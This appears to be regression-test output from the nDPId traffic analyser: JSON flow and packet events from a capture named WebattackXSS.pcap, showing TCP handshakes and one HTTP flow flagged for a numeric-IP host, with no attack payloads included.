-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6397,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":2,"flow_last_seen":1499347734348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347734348,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ69JCAHRCyCpXpqAScSAd2QAAAgQFtAQCCAoD5aYUATvUnwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6398,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":3,"flow_last_seen":1499347734349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347734349,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gztAAD4GQp2sEAABwKgKMuvSAFDIKlemQgB0Q4AQAOW83wAAAQEICgE71KAD5aYU"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347735664,"flow_last_seen":1499347735664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347735664,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1499347735664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347735664,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QgpAAD4Gg8asEAABwKgKMuvgAFB2opfiAAAAAKACchCNKgAAAgQFtAQCCAoBO9XoAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":2,"flow_last_seen":1499347735664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347735664,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6+DN1JXXdqKX46AScSB\/GgAAAgQFtAQCCAoD5addATvV6AEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":3,"flow_last_seen":1499347735665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347735665,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QgtAAD4Gg82sEAABwKgKMuvgAFB2opfjzdSV2IAQAOUeIQAAAQEICgE71ekD5add"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6430,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347738229,"flow_last_seen":1499347738229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347738229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6430,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1499347738229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347738229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bexAAD4GV+SsEAABwKgKMuv6AFCQibWGAAAAAKACchBTAwAAAgQFtAQCCAoBO9hqAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6431,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":2,"flow_last_seen":1499347738229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347738229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6\/pIUQYXkIm1h6AScSBXtgAAAgQFtAQCCAoD5aneATvYagEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6432,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":3,"flow_last_seen":1499347738229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347738229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0be1AAD4GV+usEAABwKgKMuv6AFCQibWHSFEGGIAQAOX2vQAAAQEICgE72GoD5ane"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6442,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347739497,"flow_last_seen":1499347739497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347739497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6442,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1499347739497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347739497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XjZAAD4GZ5qsEAABwKgKMuwIAFCYkYeRAAAAAKACchB3pQAAAgQFtAQCCAoBO9mnAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6443,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":2,"flow_last_seen":1499347739497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347739497,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7AiW6z+EmJGHkqAScSDzEwAAAgQFtAQCCAoD5asbATvZpwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6444,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":3,"flow_last_seen":1499347739498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347739498,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XjdAAD4GZ6GsEAABwKgKMuwIAFCYkYeSlus\/hYAQAOWSGwAAAQEICgE72acD5asb"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347740751,"flow_last_seen":1499347740751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740751,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1499347740751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347740751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8V35AAD4GblKsEAABwKgKMuwWAFBKCo2eAAAAAKACchC+2AAAAgQFtAQCCAoBO9rgAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6455,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":2,"flow_last_seen":1499347740751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347740751,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Bb1vAeUSgqNn6AScSASLAAAAgQFtAQCCAoD5axVATva4AEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6456,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":3,"flow_last_seen":1499347740752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347740752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0V39AAD4GblmsEAABwKgKMuwWAFBKCo2f9bwHlYAQAOWxMwAAAQEICgE72uAD5axV"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347616210,"flow_last_seen":1499347621787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347616210,"flow_last_seen":1499347621787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347617491,"flow_last_seen":1499347622787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347617491,"flow_last_seen":1499347622787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347618757,"flow_last_seen":1499347623788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347618757,"flow_last_seen":1499347623788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347621256,"flow_last_seen":1499347626789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347621256,"flow_last_seen":1499347626789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347622524,"flow_last_seen":1499347627790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347622524,"flow_last_seen":1499347627790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347623786,"flow_last_seen":1499347628791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347623786,"flow_last_seen":1499347628791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6472,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347743331,"flow_last_seen":1499347743331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347743331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6472,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1499347743331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347743331,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iytAAD4GOqWsEAABwKgKMuwwAFCeqlZOAAAAAKACchCe6QAAAgQFtAQCCAoBO91lAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":2,"flow_last_seen":1499347743331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347743331,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7DCbKjZEnqpWT6AScSAbmgAAAgQFtAQCCAoD5a7aATvdZQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6474,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":3,"flow_last_seen":1499347743332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347743332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iyxAAD4GOqysEAABwKgKMuwwAFCeqlZPmyo2RYAQAOW6oQAAAQEICgE73WUD5a7a"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347744595,"flow_last_seen":1499347744595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347744595,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1499347744595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347744595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iGtAAD4GPWWsEAABwKgKMuw+AFAw9lbKAAAAAKACchAK2AAAAgQFtAQCCAoBO96hAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6485,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":2,"flow_last_seen":1499347744595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347744595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7D5E+wDpMPZWy6AScSAR1wAAAgQFtAQCCAoD5bAWATveoQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6486,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":3,"flow_last_seen":1499347744595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347744595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iGxAAD4GPWysEAABwKgKMuw+AFAw9lbLRPsA6oAQAOWw3gAAAQEICgE73qED5bAW"} 
-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6505,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347743331,"flow_last_seen":1499347746913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347746913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347747187,"flow_last_seen":1499347747187,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347747187,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1499347747187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347747187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eZ5AAD4GTDKsEAABwKgKMuxYAFDkpJi3AAAAAKACchASmgAAAgQFtAQCCAoBO+EpAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":2,"flow_last_seen":1499347747187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347747187,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7FgZ9EBx5KSYuKAScSACkAAAAgQFtAQCCAoD5bKeATvhKQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":3,"flow_last_seen":1499347747188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347747188,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eZ9AAD4GTDmsEAABwKgKMuxYAFDkpJi4GfRAcoAQAOWhlwAAAQEICgE74SkD5bKe"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6518,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347748472,"flow_last_seen":1499347748472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347748472,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6518,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1499347748472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347748472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W1pAAD4GanasEAABwKgKMuxmAFDolLkwAAAAAKACchDs4QAAAgQFtAQCCAoBO+JqAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6519,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":2,"flow_last_seen":1499347748472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347748472,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Gb4tplB6JS5MaAScSCkAwAAAgQFtAQCCAoD5bPfATviagEDAwc="} 
